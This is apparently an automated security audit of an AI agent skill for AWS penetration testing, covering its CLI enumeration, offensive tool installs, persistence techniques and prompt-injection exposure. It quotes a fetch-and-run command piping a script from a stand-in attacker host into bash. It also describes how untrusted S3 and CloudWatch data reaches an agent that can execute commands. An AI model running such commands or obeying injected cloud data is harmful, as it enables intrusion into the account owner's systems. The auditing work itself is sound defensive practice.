aws-pentesting
Pass
Audited by Gen Agent Trust Hub on May 4, 2026
Risk Level: SAFECOMMAND_EXECUTIONEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill utilizes the AWS CLI (
aws) extensively to perform various operations such as identity verification (get-caller-identity), S3 enumeration (s3 ls), and IAM policy analysis. These are standard procedures for cloud security assessments. - [EXTERNAL_DOWNLOADS]: Recommends the installation of specialized third-party security tools and Python packages, including
s3-account-search,enumerate-iam,aws-role-juggler, and mentions frameworks likePacu,ScoutSuite, andProwlerfor automated security auditing. - [REMOTE_CODE_EXECUTION]: Documentation for Phase 4 (Persistence) includes example command templates for remote script execution (e.g.,
curl https://attacker.com/beacon | bash). These are presented strictly as illustrative examples for documenting potential attack vectors like EC2 UserData modification and SSM State Manager associations. - [PROMPT_INJECTION]: The skill exhibits surfaces for indirect prompt injection.
- Ingestion points: Data is ingested from external AWS resources, such as S3 bucket contents (
aws s3 cp) and CloudWatch logs (SKILL.md). - Boundary markers: The skill does not define explicit boundary markers or delimiters for data retrieved from AWS.
- Capability inventory: The agent has capabilities for command execution via AWS CLI and Python package installation.
- Sanitization: There is no mention of sanitization or filtering of the untrusted data retrieved from the cloud environment.
Audit Metadata